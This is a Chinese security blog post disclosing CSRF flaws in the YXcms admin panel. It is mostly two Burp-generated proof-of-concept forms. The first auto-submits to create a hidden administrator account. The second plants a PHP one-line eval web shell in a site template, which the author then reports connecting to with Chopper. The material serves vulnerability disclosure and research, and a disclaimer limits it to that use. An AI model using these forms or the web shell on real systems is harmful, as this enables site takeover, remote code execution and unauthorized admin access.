YXcms后台csrf添加管理员+getshell 没穿底裤 714文章 0评论 2020年1月1日04:15:29评论1,001 views字数 993阅读3分18秒阅读模式 摘要蛇精病1、后台添加管理然后用burp截断我们发现没有验证,然后就构造表单2、再来看如何getshell 模版,新建 漏洞作者: 蛇精病 漏洞证明: 1、后台添加管理然后用burp截断 我们发现没有验证,然后就构造表单 <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form id="post123" name="post123" action="http://127.0.0.1/index.php?r=admin/admin/index" method="POST"> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="username" value="snake" /> <input type="hidden" name="rpassword" value="wuyun1" /> <input type="hidden" name="spassword" value="wuyun1" /> <input type="hidden" name="realname" value="" /> <input type="hidden" name="iflock" value="0" /> <script> document.getElementById('post123').submit(); </script> </form> </body> </html> 2、再来看如何getshell 模版,新建 插入一句话木马,然后截断 同样没有验证,构造表单如下 <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="http://127.0.0.1/index.php?r=admin/set/tpadd&Mname=default" method="POST"> <input type="hidden" name="filename" value="1" /> <input type="hidden" name="code" value="<?php eval($_POST[g]);?>" /> <input type="submit" value="Submit request" /> </form> </body> </html> 接下来用菜刀连接试试 连接成功 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/76150.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论